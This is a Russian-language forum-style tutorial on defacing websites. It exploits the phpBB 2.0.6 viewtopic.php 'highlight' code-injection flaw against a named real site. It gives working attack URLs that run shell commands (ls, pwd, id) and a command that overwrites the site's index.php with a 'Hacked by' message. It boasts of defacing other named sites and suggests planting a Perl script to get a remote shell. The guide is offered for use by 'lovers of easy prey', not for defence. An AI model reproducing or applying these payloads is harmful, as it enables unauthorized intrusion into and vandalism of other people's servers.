Полное руководство по дефейсу (updated)

Введение
Я часто вижу вопрос на форуме: "Как ломать сайты?" или "Как задефэйсить сайт?". Сегодня вы сможете дефэйснуть портал, не приложив ни капли усилий! Всех любителей легкой добычи приглашаю! =)

Основная часть
Сегодня я расскажу о том, как делаются дефэйсы различных сайтов, через ошибки в популярных скриптах. Недавно была обнаружена серьезная дыра в безопасности популярного движка phpBB.
Уязвимость была обнаружена в модуле viewtopic.php

Дело в том, что удаленный атакующий мог выполнить произвольный php-сценарий на уязвимой системе при передаче примерно такой строки viewtopic.php?t=1&highlight=%27

Как вы уже, наверное, догадались, эта уязвимость позволяет выполнять произвольные команды любой длинны на уязвимом сервере. Сегодня мы воспользуемся этой дыркой, и вместе с вами сломаем реально существующий сервер. Целью нашей будет являться именно дефейс, то есть замена главной страницы сайта на нашу.

Итак, приступим, нашей жертвой станет www.maxmuscle.dk (на момент публикации статьи портал устойчив к уязвимости).
Первое что бросается нам в глаза, при посещении этой страницы, так это то, что он построен на основе портальной системы php-nuke.

По умолчанию в этой системе форумом является именно phpBB. Мы щелкаем по линку который ведет нас к форуму, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) и убеждаемся в том, что это именно phpBB версии 2.0.6.

Мы передаем форуму запрос такого вида:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s=

и обнаруживаем что движок поглотил строчку о чем свидетельствует характерная надпись вместо ника одного из пользователей: ")#i". Но это ещё ничего не значит, у нас с легкостью может обломиться выполнение команд на этом сервере, но мы не будем гадать и просто попробуем выполнить ее:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s=pwd

Эта команда (pwd) должна показать нам директорию, в которой мы сейчас находимся, если это произойдет, то из этого следует вывод что выполнение команд на сервере возможно. Так и происходит. Путь директории /var/www/html/osclux/ выведен на экран. Следующей командой следует «id» для проверки нашего доступа.

Как мы видим права у нас uid=99 (nobody), то есть права вэб сервера. Теперь мы выводим листинг папок и файлов в директории html_public, командой "dir /var/www/html/osclux" и обнаруживаем что так необходимый нам для дефэйса index.php лежит в этой директории.

Итак, мы на финишной прямой - выполнив команду echo Hacked by vasya > index.php , мы вывдем на главную страницу надпись «Hacked by vasya». Проверяем. Получилось.

Вы сделали дефейс.

Вместо заключения
Именно таким вот нехитрым образом был проведен дефэйс hackzona.ru, именно так был сломан форум на nsd.ru. Замечу так же что это самая простая реализация этой дырки, при хороших условиях можно с легкостью заливить на сервер, слушающий определенный порт, скрипт на перле и получить уже полноценный шелл с nobody правами.

Дата створення/оновлення: 25.05.2018